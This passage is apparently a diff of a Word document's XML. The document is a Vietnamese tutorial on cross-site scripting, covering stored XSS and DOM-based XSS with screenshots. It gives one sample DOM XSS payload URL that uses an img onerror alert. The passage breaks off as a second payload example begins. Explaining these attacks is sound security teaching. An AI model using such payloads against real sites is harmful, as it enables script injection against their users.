         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19B20F8C" wp14:editId="69D62AFC">
-            <wp:extent cx="4305300" cy="2409190"/>
-            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
-            <wp:docPr id="22" name="Picture 22"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB45850" wp14:editId="6FD90A4D">
+            <wp:extent cx="3592469" cy="3347595"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="5715"/>
+            <wp:docPr id="11" name="Picture 11" descr="https://images.viblo.asia/full/72034203-9f22-43d5-8f50-8b9920220fc6.png"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -19292,23 +21934,1632 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
+                    <pic:cNvPr id="0" name="Picture 10" descr="https://images.viblo.asia/full/72034203-9f22-43d5-8f50-8b9920220fc6.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId24">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4323952" cy="2419627"/>
+                      <a:ext cx="3607427" cy="3361533"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tiếp theo, khi người dùng truy cập vào ứng dụng web và thực hiện các thao tác liên quan đến dữ liệu được lưu này, đoạn mã của hacker sẽ được thực thi trên trình duyệt người dùng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F299657" wp14:editId="60CCA489">
+            <wp:extent cx="5220335" cy="1266670"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="15" name="Picture 15" descr="https://images.viblo.asia/full/4eb853ff-080d-41d2-8682-84dffadf8ea6.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 17" descr="https://images.viblo.asia/full/4eb853ff-080d-41d2-8682-84dffadf8ea6.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5220335" cy="1266670"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Kịch bản khai thác:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:noProof/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="032C3D4E" wp14:editId="53387A01">
+            <wp:extent cx="4328795" cy="2432685"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="16" name="Picture 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4328795" cy="2432685"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1584"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>DOM-based XSS (XSS Dựa Trên DOM)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Dạng tấn công này xảy ra hoàn toàn ở phía client (trình duyệt). Nó lợi dụng các lỗ hổng trong mã JavaScript của trang web để thay đổi Cây mô hình đối tượng tài liệu (DOM) của trình duyệt, từ đó chèn và thực thi mã độc. Dữ liệu độc hại không cần phải đi qua máy chủ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Cơ chế</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hoạt động dựa trên việc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ã độc hoạt động trong trình duyệ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>t của  n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n nhân chứa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>dữ liệ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>u đến xử lý  DOM đên thực thi ở n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n nhân.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Kẻ tấn công lợi dụng các hàm JavaScript xử lý dữ liệu từ các nguồn không đáng tin cậy như location.hash hoặc document.referrer mà không lọc dữ liệu trước khi chèn vào DOM (ví dụ: sử dụ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ng innerHTML).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Ví dụ Khai thác: Sử dụng đoạn URL:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="720" w:type="dxa"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="7491"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8211" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:i/>
+                <w:iCs/>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+                <w:sz w:val="26"/>
+                <w:szCs w:val="26"/>
+              </w:rPr>
+              <w:t>https://victimsite.com/page#name=&lt;img src=x onerror=alert('DOM_XSS')&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ỹ thuật khai thác XSS dựa trên việc thay đổi cấu trúc DOM của tài liệu, cụ thể là HTML. Chúng ta cùng xem xét một ví dụ cụ thể</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sau.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Một website có URL đến trang đăng ký như sau:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>http://example.com/register.php?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>message=Please fill in the form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Khi truy cập đến thì chúng ta thấy một Form rất bình thường</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07E099D4" wp14:editId="054A5CFB">
+            <wp:extent cx="3818686" cy="1485900"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="19" name="Picture 19" descr="https://images.viblo.asia/full/2cfc5b4c-2e62-4ca3-9a0e-2a033830d3ff.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 20" descr="https://images.viblo.asia/full/2cfc5b4c-2e62-4ca3-9a0e-2a033830d3ff.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3829655" cy="1490168"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Thay vì truyề</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>message=Please fill in the form</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thì kẻ tấn công xử lý</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> truyền</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="720" w:type="dxa"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="7491"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8211" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
